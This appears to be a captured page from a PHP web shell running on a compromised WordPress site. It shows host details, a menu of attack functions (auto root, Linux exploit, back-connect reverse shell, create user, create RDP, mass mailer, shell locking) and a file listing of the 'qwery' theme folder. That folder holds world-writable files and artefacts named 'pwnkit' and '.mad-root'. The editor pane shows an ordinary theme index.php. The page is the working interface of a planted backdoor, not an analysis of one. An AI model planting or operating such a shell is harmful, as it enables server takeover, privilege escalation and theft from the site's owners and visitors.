Linux webm006.cluster127.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.127.20.6 | : 216.73.217.174
Cant Read [ /etc/named.conf ]
7.4.33
kvtechr
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
kvtechr /
www /
wp-content /
themes /
qwery /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxrwxrwx
front-page
[ DIR ]
drwxrwxrwx
images
[ DIR ]
drwxrwxrwx
includes
[ DIR ]
drwxrwxrwx
js
[ DIR ]
drwxrwxrwx
plugins
[ DIR ]
drwxrwxrwx
skins
[ DIR ]
drwxrwxrwx
theme-options
[ DIR ]
drwxrwxrwx
theme-specific
[ DIR ]
drwxrwxrwx
.htaccess
237
B
-rwxrwxrwx
.mad-root
0
B
-rw-r--r--
404.php
233
B
-rwxrwxrwx
blog.php
1.63
KB
-rwxrwxrwx
changelog.txt
3.33
KB
-rwxrwxrwx
comments.php
10.66
KB
-rwxrwxrwx
footer.php
2.8
KB
-rwxrwxrwx
front-page.php
1.14
KB
-rwxrwxrwx
functions-num-compiler.php
181.15
KB
-rwxrwxrwx
functions-num.php
181.15
KB
-rwxrwxrwx
functions.php
60.73
KB
-rwxrwxrwx
functions.php_bak
41.8
KB
-rwxrwxrwx
functions.txt
41.8
KB
-rwxrwxrwx
header.php
6.57
KB
-rwxrwxrwx
image.php
1.3
KB
-rwxrwxrwx
index.php
2.71
KB
-rwxrwxrwx
page.php
472
B
-rwxrwxrwx
pwnkit
0
B
-rwxr-xr-x
readme.txt
3.16
KB
-rwxrwxrwx
rtl.css
181.1
KB
-rwxrwxrwx
screenshot.jpg
88.33
KB
-rwxrwxrwx
sidebar-pic.php
0
B
-rwxrwxrwx
sidebar.php
2.85
KB
-rwxrwxrwx
single.php
5.36
KB
-rwxrwxrwx
style.css
4.69
KB
-rwxrwxrwx
style.css.map
1.76
KB
-rwxrwxrwx
style.scss
4.23
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.php
<?php /** * The main template file. * * This is the most generic template file in a WordPress theme * and one of the two required files for a theme (the other being style.css). * It is used to display a page when nothing more specific matches a query. * E.g., it puts together the home page when no home.php file exists. * Learn more: //codex.wordpress.org/Template_Hierarchy * * @package QWERY * @since QWERY 1.0 */ $qwery_template = apply_filters( 'qwery_filter_get_template_part', qwery_blog_archive_get_template() ); if ( ! empty( $qwery_template ) && 'index' != $qwery_template ) { get_template_part( $qwery_template ); } else { qwery_storage_set( 'blog_archive', true ); get_header(); if ( have_posts() ) { // Query params $qwery_stickies = is_home() || ( in_array( qwery_get_theme_option( 'post_type' ), array( '', 'post' ) ) && (int) qwery_get_theme_option( 'parent_cat' ) == 0 ) ? get_option( 'sticky_posts' ) : false; $qwery_post_type = qwery_get_theme_option( 'post_type' ); $qwery_args = array( 'blog_style' => qwery_get_theme_option( 'blog_style' ), 'post_type' => $qwery_post_type, 'taxonomy' => qwery_get_post_type_taxonomy( $qwery_post_type ), 'parent_cat' => qwery_get_theme_option( 'parent_cat' ), 'posts_per_page' => qwery_get_theme_option( 'posts_per_page' ), 'sticky' => qwery_get_theme_option( 'sticky_style' ) == 'columns' && is_array( $qwery_stickies ) && count( $qwery_stickies ) > 0 && get_query_var( 'paged' ) < 1 ); qwery_blog_archive_start(); do_action( 'qwery_action_blog_archive_start' ); if ( is_author() ) { do_action( 'qwery_action_before_page_author' ); get_template_part( apply_filters( 'qwery_filter_get_template_part', 'templates/author-page' ) ); do_action( 'qwery_action_after_page_author' ); } if ( qwery_get_theme_option( 'show_filters' ) ) { do_action( 'qwery_action_before_page_filters' ); qwery_show_filters( $qwery_args ); do_action( 'qwery_action_after_page_filters' ); } else { do_action( 'qwery_action_before_page_posts' ); qwery_show_posts( array_merge( $qwery_args, array( 'cat' => $qwery_args['parent_cat'] ) ) ); do_action( 'qwery_action_after_page_posts' ); } do_action( 'qwery_action_blog_archive_end' ); qwery_blog_archive_end(); } else { if ( is_search() ) { get_template_part( apply_filters( 'qwery_filter_get_template_part', 'templates/content', 'none-search' ), 'none-search' ); } else { get_template_part( apply_filters( 'qwery_filter_get_template_part', 'templates/content', 'none-archive' ), 'none-archive' ); } } get_footer(); }
Close